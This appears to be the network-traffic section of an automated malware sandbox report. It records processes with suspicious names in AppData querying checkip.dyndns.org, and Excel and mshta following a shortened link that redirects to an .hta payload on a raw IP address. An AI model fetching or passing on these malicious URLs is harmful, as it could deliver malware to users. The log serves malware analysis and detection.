                                    8192.168.2.2249177132.226.247.73803620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:24:58.500109911 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:24:59.179740906 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:59 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 2fd07161d190e4874bcd60fb4b3816ad
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:59.390923977 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:59 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 2fd07161d190e4874bcd60fb4b3816ad
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.2249178158.101.44.242803560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:24:58.649527073 CEST151OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 13, 2024 20:24:59.379631042 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:59 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 1d24f5dfc7c6a80adb608014d6b1a500
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:24:59.402529955 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:24:59.558949947 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:24:59 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 4518770b963d7e6c3cae8719af6dae25
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:25:00.388864994 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:25:01.382674932 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:01 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: e879407e436a69812c4b71d93273ccdf
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.2249181132.226.8.169803620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:25:00.011382103 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:25:03.663494110 CEST272INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:03 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:25:03.874996901 CEST272INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:03 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.2249183132.226.8.169803560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:25:02.045598030 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:25:13.230700970 CEST272INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:13 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:25:14.412420988 CEST272INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:13 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:25:14.413281918 CEST272INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:13 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:25:14.413945913 CEST272INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:13 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.2249185193.122.6.168803620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:25:04.384572029 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.2249187132.226.8.169803560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:25:14.589778900 CEST151OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 13, 2024 20:25:16.753338099 CEST272INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:16 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:25:16.753515005 CEST272INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:16 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.2249189132.226.8.169803560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:25:18.399682999 CEST151OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 13, 2024 20:25:19.203609943 CEST272INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:19 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.2249191132.226.247.73803560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:25:19.983536005 CEST151OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 13, 2024 20:25:20.669493914 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:20 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 238c62b02111099329f6142122783c08
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.2249193193.122.6.168803560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:25:21.355319977 CEST151OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 13, 2024 20:25:26.251801968 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:26 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: fc53a97d611d838026d9b78c14f1ae30
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.2249194193.122.6.168803620C:\Users\user\AppData\Roaming\sihost.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:25:25.803679943 CEST127OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Aug 13, 2024 20:25:30.782433987 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:30 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 39975fcc490e1dd0104fff61d329d099
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:25:31.864541054 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:30 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 39975fcc490e1dd0104fff61d329d099
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:25:31.867202044 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:30 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 39975fcc490e1dd0104fff61d329d099
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:25:31.871303082 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:30 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 39975fcc490e1dd0104fff61d329d099
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.2249196193.122.6.168803560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:25:26.943600893 CEST151OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 13, 2024 20:25:31.872004986 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:31 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 7cb56dc783da971cc78e747ba5f5bd90
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                    Aug 13, 2024 20:25:31.927282095 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:31 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: 7cb56dc783da971cc78e747ba5f5bd90
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.2249200193.122.6.168803560C:\Users\user\AppData\Roaming\bKVNuVuE.exe
                                    TimestampBytes transferredDirectionData
                                    Aug 13, 2024 20:25:32.656517029 CEST151OUTGET / HTTP/1.1
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                    Host: checkip.dyndns.org
                                    Connection: Keep-Alive
                                    Aug 13, 2024 20:25:36.762876987 CEST320INHTTP/1.1 200 OK
                                    Date: Tue, 13 Aug 2024 18:25:36 GMT
                                    Content-Type: text/html
                                    Content-Length: 103
                                    Connection: keep-alive
                                    Cache-Control: no-cache
                                    Pragma: no-cache
                                    X-Request-ID: c77b5d0cdc67354dd9cce01bbacf0406
                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.2249161159.203.133.154431208C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:24:24 UTC321OUTGET /JkAPbL HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: exi.link
                                    Connection: Keep-Alive
                                    2024-08-13 18:24:24 UTC717INHTTP/1.1 301 Moved Permanently
                                    Date: Tue, 13 Aug 2024 18:24:24 GMT
                                    Server: Apache/2.4.61 (Debian)
                                    Set-Cookie: PHPSESSID=3kksqcn89f8g7vnr22c4n7l71f; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    Set-Cookie: short_3115571=1; expires=Tue, 13 Aug 2024 18:39:24 GMT; Max-Age=900; path=/; HttpOnly
                                    location: http://192.3.176.138/xampp/sop/40.hta
                                    Connection: keep-alive, close
                                    Keep-Alive: timeout=100,max=500
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET,PUT,POST
                                    Access-Control-Allow-Headers: Content-Type, Authorization
                                    Access-Control-Allow-Credentials: true
                                    Content-Length: 0
                                    Content-Type: text/html; charset=UTF-8


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.2249163159.203.133.154432480C:\Windows\System32\mshta.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-13 18:24:28 UTC370OUTGET /JkAPbL HTTP/1.1
                                    Accept: */*
                                    Accept-Language: en-US
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                    Host: exi.link
                                    Connection: Keep-Alive
                                    Cookie: short_3115571=1
                                    2024-08-13 18:24:28 UTC618INHTTP/1.1 301 Moved Permanently
                                    Date: Tue, 13 Aug 2024 18:24:28 GMT
                                    Server: Apache/2.4.61 (Debian)
                                    Set-Cookie: PHPSESSID=k3sg4v866vo8cdk39f62jvtol0; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    location: http://192.3.176.138/xampp/sop/40.hta
                                    Connection: keep-alive, close
                                    Keep-Alive: timeout=100,max=500
